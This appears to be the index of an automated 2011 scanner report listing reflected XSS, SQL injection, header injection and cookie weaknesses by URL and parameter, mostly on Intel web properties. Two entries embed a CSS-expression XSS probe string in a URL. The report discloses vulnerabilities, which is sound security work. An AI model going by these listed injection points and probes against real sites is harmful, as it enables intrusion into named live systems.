Intel Web System Example, Cross Site Scripting, XSS, CWE-79, CAPEC-86

XSS in INTC HTTP Systems | Vulnerability Crawler Report

Report generated by CloudScan Vulnerability Crawler at Sun Feb 06 08:56:57 CST 2011.

DORK CWE-79 XSS Report

Loading

1. SQL injection

1.1. http://6418dc.r.axf8.net/mr/a.gif [a parameter]

1.2. http://www91.intel.com/b/ss/intelcorp,intelnewscorp,intelnewsglobal/1/H.20.3/s88289088732562 [REST URL parameter 1]

1.3. http://www91.intel.com/b/ss/intelcorp,intelnewscorp,intelnewsglobal/1/H.20.3/s88289088732562 [REST URL parameter 3]

1.4. http://www91.intel.com/b/ss/intelcorp,intelnewscorp,intelnewsglobal/1/H.20.3/s88289088732562 [REST URL parameter 6]

2. XPath injection

3. HTTP header injection

3.1. http://rss.intel.com/click/~rss-182178-c1-264110/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations [REST URL parameter 2]

3.2. http://rss.intel.com/click/~rss-182178-c1-264136/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry [REST URL parameter 2]

3.3. http://rss.intel.com/click/~rss-182178-c1-264138/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard [REST URL parameter 2]

3.4. http://rss.intel.com/click/~rss-182178-c1-264171/newsroom.intel.com/community/intel_newsroom/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio [REST URL parameter 2]

3.5. http://rss.intel.com/click/~rss-182178-c1-264172/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-up [REST URL parameter 2]

3.6. http://rss.intel.com/click/~rss-258152-c1-264090/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign [REST URL parameter 2]

3.7. http://rss.intel.com/click/~rss-258152-c1-264093/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business [REST URL parameter 2]

3.8. http://rss.intel.com/click/~rss-258152-c1-264102/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-identifies-chipset-design-error-implementing-solution [REST URL parameter 2]

3.9. http://rss.intel.com/click/~rss-258152-c1-264131/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours [REST URL parameter 2]

4. Cross-site scripting (reflected)

4.1. http://digg.com/submit [REST URL parameter 1]

4.2. http://inside.intel.com/LOPFeedMashup [SN parameter]

4.3. http://inside.intel.com/LOPSPFeedMashup [SN1 parameter]

4.4. http://inside.intel.com/LOPSPFeedMashup [SN2 parameter]

4.5. http://inside.intel.com/LOPSPFeedMashup [SN3 parameter]

4.6. http://itcenter.intel.com/ResourceLibrary [name of an arbitrarily supplied request parameter]

4.7. http://itcenter.intel.com/ResourceLibrary [name of an arbitrarily supplied request parameter]

4.8. http://newsroom.intel.com/render-widget!execute.jspa [idPrefix parameter]

4.9. http://newsroom.intel.com/render-widget!execute.jspa [idPrefix parameter]

4.10. http://newsroom.intel.com/render-widget!execute.jspa [idPrefix parameter]

4.11. http://newsroom.intel.com/render-widget!execute.jspa [idPrefix parameter]

4.12. http://pubads.g.doubleclick.net/gampad/ads [slotname parameter]

4.13. http://www.freedownloadscenter.com/mybeta/Search/newsearch.php3 [q parameter]

4.14. http://www.freedownloadscenter.com/mybeta/Search/newsearch.php3 [q parameter]

4.15. http://www.freedownloadscenter.com/mybeta/Search/newsearch.php3 [q parameter]

4.16. http://appdeveloper.intel.com/en-us/blog/2011/02/04/location-awareness-demo-qt-creator-using-qml [Referer HTTP header]

4.17. http://rss.intel.com/click/~rss-182178-c1-264110/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations [REST URL parameter 10]

4.18. http://rss.intel.com/click/~rss-182178-c1-264110/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations [REST URL parameter 2]

4.19. http://rss.intel.com/click/~rss-182178-c1-264110/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations [REST URL parameter 3]

4.20. http://rss.intel.com/click/~rss-182178-c1-264110/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations [REST URL parameter 4]

4.21. http://rss.intel.com/click/~rss-182178-c1-264110/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations [REST URL parameter 5]

4.22. http://rss.intel.com/click/~rss-182178-c1-264110/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations [REST URL parameter 6]

4.23. http://rss.intel.com/click/~rss-182178-c1-264110/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations [REST URL parameter 7]

4.24. http://rss.intel.com/click/~rss-182178-c1-264110/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations [REST URL parameter 8]

4.25. http://rss.intel.com/click/~rss-182178-c1-264110/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations [REST URL parameter 9]

4.26. http://rss.intel.com/click/~rss-182178-c1-264136/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry [REST URL parameter 10]

4.27. http://rss.intel.com/click/~rss-182178-c1-264136/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry [REST URL parameter 2]

4.28. http://rss.intel.com/click/~rss-182178-c1-264136/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry [REST URL parameter 3]

4.29. http://rss.intel.com/click/~rss-182178-c1-264136/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry [REST URL parameter 4]

4.30. http://rss.intel.com/click/~rss-182178-c1-264136/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry [REST URL parameter 5]

4.31. http://rss.intel.com/click/~rss-182178-c1-264136/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry [REST URL parameter 6]

4.32. http://rss.intel.com/click/~rss-182178-c1-264136/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry [REST URL parameter 7]

4.33. http://rss.intel.com/click/~rss-182178-c1-264136/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry [REST URL parameter 8]

4.34. http://rss.intel.com/click/~rss-182178-c1-264136/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry [REST URL parameter 9]

4.35. http://rss.intel.com/click/~rss-182178-c1-264138/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard [REST URL parameter 10]

4.36. http://rss.intel.com/click/~rss-182178-c1-264138/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard [REST URL parameter 2]

4.37. http://rss.intel.com/click/~rss-182178-c1-264138/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard [REST URL parameter 3]

4.38. http://rss.intel.com/click/~rss-182178-c1-264138/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard [REST URL parameter 4]

4.39. http://rss.intel.com/click/~rss-182178-c1-264138/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard [REST URL parameter 5]

4.40. http://rss.intel.com/click/~rss-182178-c1-264138/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard [REST URL parameter 6]

4.41. http://rss.intel.com/click/~rss-182178-c1-264138/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard [REST URL parameter 7]

4.42. http://rss.intel.com/click/~rss-182178-c1-264138/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard [REST URL parameter 8]

4.43. http://rss.intel.com/click/~rss-182178-c1-264138/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard [REST URL parameter 9]

4.44. http://rss.intel.com/click/~rss-182178-c1-264171/newsroom.intel.com/community/intel_newsroom/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio [REST URL parameter 10]

4.45. http://rss.intel.com/click/~rss-182178-c1-264171/newsroom.intel.com/community/intel_newsroom/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio [REST URL parameter 2]

4.46. http://rss.intel.com/click/~rss-182178-c1-264171/newsroom.intel.com/community/intel_newsroom/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio [REST URL parameter 3]

4.47. http://rss.intel.com/click/~rss-182178-c1-264171/newsroom.intel.com/community/intel_newsroom/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio [REST URL parameter 4]

4.48. http://rss.intel.com/click/~rss-182178-c1-264171/newsroom.intel.com/community/intel_newsroom/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio [REST URL parameter 5]

4.49. http://rss.intel.com/click/~rss-182178-c1-264171/newsroom.intel.com/community/intel_newsroom/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio [REST URL parameter 6]

4.50. http://rss.intel.com/click/~rss-182178-c1-264171/newsroom.intel.com/community/intel_newsroom/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio [REST URL parameter 7]

4.51. http://rss.intel.com/click/~rss-182178-c1-264171/newsroom.intel.com/community/intel_newsroom/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio [REST URL parameter 8]

4.52. http://rss.intel.com/click/~rss-182178-c1-264171/newsroom.intel.com/community/intel_newsroom/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio [REST URL parameter 9]

4.53. http://rss.intel.com/click/~rss-182178-c1-264172/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-up [REST URL parameter 10]

4.54. http://rss.intel.com/click/~rss-182178-c1-264172/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-up [REST URL parameter 2]

4.55. http://rss.intel.com/click/~rss-182178-c1-264172/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-up [REST URL parameter 3]

4.56. http://rss.intel.com/click/~rss-182178-c1-264172/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-up [REST URL parameter 4]

4.57. http://rss.intel.com/click/~rss-182178-c1-264172/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-up [REST URL parameter 5]

4.58. http://rss.intel.com/click/~rss-182178-c1-264172/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-up [REST URL parameter 6]

4.59. http://rss.intel.com/click/~rss-182178-c1-264172/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-up [REST URL parameter 7]

4.60. http://rss.intel.com/click/~rss-182178-c1-264172/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-up [REST URL parameter 8]

4.61. http://rss.intel.com/click/~rss-182178-c1-264172/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-up [REST URL parameter 9]

4.62. http://rss.intel.com/click/~rss-258152-c1-264090/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign [REST URL parameter 10]

4.63. http://rss.intel.com/click/~rss-258152-c1-264090/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign [REST URL parameter 2]

4.64. http://rss.intel.com/click/~rss-258152-c1-264090/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign [REST URL parameter 3]

4.65. http://rss.intel.com/click/~rss-258152-c1-264090/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign [REST URL parameter 4]

4.66. http://rss.intel.com/click/~rss-258152-c1-264090/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign [REST URL parameter 5]

4.67. http://rss.intel.com/click/~rss-258152-c1-264090/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign [REST URL parameter 6]

4.68. http://rss.intel.com/click/~rss-258152-c1-264090/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign [REST URL parameter 7]

4.69. http://rss.intel.com/click/~rss-258152-c1-264090/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign [REST URL parameter 8]

4.70. http://rss.intel.com/click/~rss-258152-c1-264090/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign [REST URL parameter 9]

4.71. http://rss.intel.com/click/~rss-258152-c1-264093/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business [REST URL parameter 10]

4.72. http://rss.intel.com/click/~rss-258152-c1-264093/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business [REST URL parameter 2]

4.73. http://rss.intel.com/click/~rss-258152-c1-264093/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business [REST URL parameter 3]

4.74. http://rss.intel.com/click/~rss-258152-c1-264093/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business [REST URL parameter 4]

4.75. http://rss.intel.com/click/~rss-258152-c1-264093/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business [REST URL parameter 5]

4.76. http://rss.intel.com/click/~rss-258152-c1-264093/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business [REST URL parameter 6]

4.77. http://rss.intel.com/click/~rss-258152-c1-264093/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business [REST URL parameter 7]

4.78. http://rss.intel.com/click/~rss-258152-c1-264093/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business [REST URL parameter 8]

4.79. http://rss.intel.com/click/~rss-258152-c1-264093/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business [REST URL parameter 9]

4.80. http://rss.intel.com/click/~rss-258152-c1-264102/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-identifies-chipset-design-error-implementing-solution [REST URL parameter 10]

4.81. http://rss.intel.com/click/~rss-258152-c1-264102/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-identifies-chipset-design-error-implementing-solution [REST URL parameter 2]

4.82. http://rss.intel.com/click/~rss-258152-c1-264102/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-identifies-chipset-design-error-implementing-solution [REST URL parameter 3]

4.83. http://rss.intel.com/click/~rss-258152-c1-264102/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-identifies-chipset-design-error-implementing-solution [REST URL parameter 4]

4.84. http://rss.intel.com/click/~rss-258152-c1-264102/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-identifies-chipset-design-error-implementing-solution [REST URL parameter 5]

4.85. http://rss.intel.com/click/~rss-258152-c1-264102/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-identifies-chipset-design-error-implementing-solution [REST URL parameter 6]

4.86. http://rss.intel.com/click/~rss-258152-c1-264102/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-identifies-chipset-design-error-implementing-solution [REST URL parameter 7]

4.87. http://rss.intel.com/click/~rss-258152-c1-264102/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-identifies-chipset-design-error-implementing-solution [REST URL parameter 8]

4.88. http://rss.intel.com/click/~rss-258152-c1-264102/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-identifies-chipset-design-error-implementing-solution [REST URL parameter 9]

4.89. http://rss.intel.com/click/~rss-258152-c1-264131/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours [REST URL parameter 10]

4.90. http://rss.intel.com/click/~rss-258152-c1-264131/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours [REST URL parameter 2]

4.91. http://rss.intel.com/click/~rss-258152-c1-264131/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours [REST URL parameter 3]

4.92. http://rss.intel.com/click/~rss-258152-c1-264131/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours [REST URL parameter 4]

4.93. http://rss.intel.com/click/~rss-258152-c1-264131/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours [REST URL parameter 5]

4.94. http://rss.intel.com/click/~rss-258152-c1-264131/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours [REST URL parameter 6]

4.95. http://rss.intel.com/click/~rss-258152-c1-264131/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours [REST URL parameter 7]

4.96. http://rss.intel.com/click/~rss-258152-c1-264131/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours [REST URL parameter 8]

4.97. http://rss.intel.com/click/~rss-258152-c1-264131/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours [REST URL parameter 9]

4.98. http://www.intel.com/pressroom/index.htm [iid parameter]

4.99. http://www.intel.com/pressroom/index.htm [name of an arbitrarily supplied request parameter]

5. Flash cross-domain policy

5.1. http://i.ytimg.com/crossdomain.xml

5.2. http://gdata.youtube.com/crossdomain.xml

5.3. http://www.facebook.com/crossdomain.xml

5.4. http://www.intel.com/crossdomain.xml

6. Cleartext submission of password

6.1. http://digg.com/submit

6.2. http://www.ericmmartin.com/projects/simplemodal/

6.3. http://www.intel.com/cd/channel/distributor/asmo-na/eng/index.htm

6.4. http://www.intel.com/cd/channel/reseller/asmo-na/eng/index.htm

7. SQL statement in request parameter

8. SSL cookie without secure flag set

9. Session token in URL

9.1. http://www.intel.com/cd/channel/distributor/asmo-na/eng/index.htm

9.2. http://www.intel.com/cd/channel/reseller/asmo-na/eng/index.htm

9.3. http://www.intel.com/references/index.htm

10. Password field submitted using GET method

11. Cookie scoped to parent domain

11.1. http://communities.intel.com/community/openportit/server

11.2. http://communities.intel.com/community/openportit/vproexpert

11.3. http://communities.intel.com/community/tech

11.4. http://communities.intel.com/community/tech/desktop

11.5. http://communities.intel.com/index.jspa

11.6. http://newsroom.intel.com/4.0.6/resources/scripts/gen/0e7c6c42e74b788f13ba0b4d8d125742.js

11.7. http://newsroom.intel.com/4.0.6/resources/scripts/gen/9c1c89344c1b0004e51eeeeed7553a8e.js

11.8. http://newsroom.intel.com/4.0.6/resources/scripts/gen/ae42b539f86ec382d61440d151aa63b2.js

11.9. http://newsroom.intel.com/4.0.6/resources/scripts/gen/ea37d19451097ab05e95257b062f6f45.js

11.10. http://newsroom.intel.com/4.0.6/styles/jive-community.css

11.11. http://newsroom.intel.com/4.0.6/styles/jive-global.css

11.12. http://newsroom.intel.com/4.0.6/styles/jive-icons.css

11.13. http://newsroom.intel.com/4.0.6/styles/jive-sidebar.css

11.14. http://newsroom.intel.com/4.0.6/styles/jive-videomodule.css

11.15. http://newsroom.intel.com/4.0.6/styles/jive-widgets.css

11.16. http://newsroom.intel.com/4.0.6/styles/tiny_mce3/plugins/inlinepopups/skins/clearlooks2/window.css

11.17. http://newsroom.intel.com/community/intel_newsroom/

11.18. http://newsroom.intel.com/community/intel_newsroom/blog/2011/0176c51%22style=%22x:expression(alert(1))%22f5ad9d5bc7f/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business

11.19. http://newsroom.intel.com/render-widget!execute.jspa

11.20. http://newsroom.intel.com/theme/white/styles/theme.css

11.21. https://secure-newsroom.intel.com/cs_login

11.22. http://software.intel.com/en-us/

11.23. http://software.intel.com/en-us/articles/intel-cloud-builders-overview/

11.24. http://software.intel.com/en-us/blogs/

11.25. http://software.intel.com/en-us/blogs/2011/01/31/everyone-has-a-dream/

11.26. http://software.intel.com/en-us/blogs/2011/01/31/everyone-has-a-dream/feed/

11.27. http://software.intel.com/en-us/blogs/2011/02/01/can-advisor-help-me-thread-my-code-even-if-i-use-templates/

11.28. http://software.intel.com/en-us/blogs/2011/02/01/can-advisor-help-me-thread-my-code-even-if-i-use-templates/feed/

11.29. http://software.intel.com/en-us/blogs/2011/02/01/half-empty-dream-cup-of-concrete-roses/

11.30. http://software.intel.com/en-us/blogs/2011/02/01/half-empty-dream-cup-of-concrete-roses/feed/

11.31. http://software.intel.com/en-us/blogs/2011/02/01/xss-vulnerabilities-continue-to-run-deep/

11.32. http://software.intel.com/en-us/blogs/2011/02/01/xss-vulnerabilities-continue-to-run-deep/feed/

11.33. http://software.intel.com/en-us/blogs/2011/02/02/meshcentralcom-new-mesh-agent-api/

11.34. http://software.intel.com/en-us/blogs/2011/02/02/meshcentralcom-new-mesh-agent-api/feed/

11.35. http://software.intel.com/en-us/blogs/2011/02/03/jeffs-notebook-a-new-joint-lifetime-and-access-synchronization-algorithm-for-shared-dynamic-objects/

11.36. http://software.intel.com/en-us/blogs/2011/02/03/jeffs-notebook-a-new-joint-lifetime-and-access-synchronization-algorithm-for-shared-dynamic-objects/feed/

11.37. http://software.intel.com/en-us/blogs/2011/02/04/developer-tools-for-upnp-update/

11.38. http://software.intel.com/en-us/blogs/2011/02/04/developer-tools-for-upnp-update/feed/

11.39. http://software.intel.com/en-us/blogs/2011/02/04/location-awareness-demo-in-qt-creator-using-qml/feed/

11.40. http://software.intel.com/en-us/blogs/2011/02/04/parallel-programmaing-talk-show-98-a-visit-with-dr-fortran-steve-lionel-discusses-coarrays-in-fortran/

11.41. http://software.intel.com/en-us/blogs/2011/02/04/parallel-programmaing-talk-show-98-a-visit-with-dr-fortran-steve-lionel-discusses-coarrays-in-fortran/feed/

11.42. http://software.intel.com/en-us/blogs/2011/02/04/parallel-programming-talk-97-viewer-q-and-a/

11.43. http://software.intel.com/en-us/blogs/2011/02/04/parallel-programming-talk-97-viewer-q-and-a/feed/

11.44. http://software.intel.com/sites/academic_showcase/

11.45. http://www.opensource.org/licenses/mit-license.php

11.46. http://www.sigcse.org/

11.47. http://code.google.com/p/simplemodal/

11.48. http://code.google.com/p/swfobject/

11.49. http://m.youtube.com/details

11.50. http://www.facebook.com/Intel

11.51. http://www.facebook.com/sharer.php

11.52. http://www.flickr.com/apps/slideshow/show.swf

11.53. http://www.flickr.com/photos/intelphotos

11.54. http://www.youtube.com/channelintel

11.55. http://www.youtube.com/view_play_list

11.56. http://www.youtube.com/watch

11.57. http://www91.intel.com/b/ss/intelcorp,intelnewscorp,intelnewsglobal/1/H.20.3/s832051251078

12. Cookie without HttpOnly flag set

12.1. http://appdeveloper.intel.com/

12.2. http://appdeveloper.intel.com/en-us/blog/2011/02/04/location-awareness-demo-qt-creator-using-qml

12.3. http://communities.intel.com/community/openportit/server

12.4. http://communities.intel.com/community/openportit/vproexpert

12.5. http://communities.intel.com/community/tech

12.6. http://communities.intel.com/community/tech/desktop

12.7. http://communities.intel.com/index.jspa

12.8. http://flesler.demos.com/jquery/scrollTo/

12.9. http://newsroom.intel.com/4.0.6/resources/scripts/gen/0e7c6c42e74b788f13ba0b4d8d125742.js

12.10. http://newsroom.intel.com/4.0.6/resources/scripts/gen/9c1c89344c1b0004e51eeeeed7553a8e.js

12.11. http://newsroom.intel.com/4.0.6/resources/scripts/gen/ae42b539f86ec382d61440d151aa63b2.js

12.12. http://newsroom.intel.com/4.0.6/resources/scripts/gen/ea37d19451097ab05e95257b062f6f45.js

12.13. http://newsroom.intel.com/4.0.6/styles/jive-community.css

12.14. http://newsroom.intel.com/4.0.6/styles/jive-global.css

12.15. http://newsroom.intel.com/4.0.6/styles/jive-icons.css

12.16. http://newsroom.intel.com/4.0.6/styles/jive-sidebar.css

12.17. http://newsroom.intel.com/4.0.6/styles/jive-videomodule.css

12.18. http://newsroom.intel.com/4.0.6/styles/jive-widgets.css

12.19. http://newsroom.intel.com/4.0.6/styles/tiny_mce3/plugins/inlinepopups/skins/clearlooks2/window.css

12.20. http://newsroom.intel.com/community/intel_newsroom/

12.21. http://newsroom.intel.com/community/intel_newsroom/blog/2011/0176c51%22style=%22x:expression(alert(1))%22f5ad9d5bc7f/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business

12.22. http://newsroom.intel.com/render-widget!execute.jspa

12.23. http://newsroom.intel.com/theme/white/styles/theme.css

12.24. http://onsite2.researchintel.com/engine/icorescript.asp

12.25. http://plugins.jquery.com/project/SimpleModal

12.26. https://secure-newsroom.intel.com/cs_login

12.27. http://software.intel.com/en-us/

12.28. http://software.intel.com/en-us/articles/intel-cloud-builders-overview/

12.29. http://software.intel.com/en-us/blogs/

12.30. http://software.intel.com/en-us/blogs/2011/01/31/everyone-has-a-dream/

12.31. http://software.intel.com/en-us/blogs/2011/01/31/everyone-has-a-dream/feed/

12.32. http://software.intel.com/en-us/blogs/2011/02/01/can-advisor-help-me-thread-my-code-even-if-i-use-templates/

12.33. http://software.intel.com/en-us/blogs/2011/02/01/can-advisor-help-me-thread-my-code-even-if-i-use-templates/feed/

12.34. http://software.intel.com/en-us/blogs/2011/02/01/half-empty-dream-cup-of-concrete-roses/

12.35. http://software.intel.com/en-us/blogs/2011/02/01/half-empty-dream-cup-of-concrete-roses/feed/

12.36. http://software.intel.com/en-us/blogs/2011/02/01/xss-vulnerabilities-continue-to-run-deep/

12.37. http://software.intel.com/en-us/blogs/2011/02/01/xss-vulnerabilities-continue-to-run-deep/feed/

12.38. http://software.intel.com/en-us/blogs/2011/02/02/meshcentralcom-new-mesh-agent-api/

12.39. http://software.intel.com/en-us/blogs/2011/02/02/meshcentralcom-new-mesh-agent-api/feed/

12.40. http://software.intel.com/en-us/blogs/2011/02/03/jeffs-notebook-a-new-joint-lifetime-and-access-synchronization-algorithm-for-shared-dynamic-objects/

12.41. http://software.intel.com/en-us/blogs/2011/02/03/jeffs-notebook-a-new-joint-lifetime-and-access-synchronization-algorithm-for-shared-dynamic-objects/feed/

12.42. http://software.intel.com/en-us/blogs/2011/02/04/developer-tools-for-upnp-update/

12.43. http://software.intel.com/en-us/blogs/2011/02/04/developer-tools-for-upnp-update/feed/

12.44. http://software.intel.com/en-us/blogs/2011/02/04/location-awareness-demo-in-qt-creator-using-qml/feed/

12.45. http://software.intel.com/en-us/blogs/2011/02/04/parallel-programmaing-talk-show-98-a-visit-with-dr-fortran-steve-lionel-discusses-coarrays-in-fortran/

12.46. http://software.intel.com/en-us/blogs/2011/02/04/parallel-programmaing-talk-show-98-a-visit-with-dr-fortran-steve-lionel-discusses-coarrays-in-fortran/feed/

12.47. http://software.intel.com/en-us/blogs/2011/02/04/parallel-programming-talk-97-viewer-q-and-a/

12.48. http://software.intel.com/en-us/blogs/2011/02/04/parallel-programming-talk-97-viewer-q-and-a/feed/

12.49. http://software.intel.com/sites/academic_showcase/

12.50. http://twitter.com/EricMMartin

12.51. http://twitter.com/intel

12.52. http://twitter.com/intelnews

12.53. http://twitter.com/share

12.54. http://www.intc.com/

12.55. http://www.intc.com/alerts.cfm

12.56. http://www.intc.com/analystCenter.cfm

12.57. http://www.intc.com/annuals.cfm

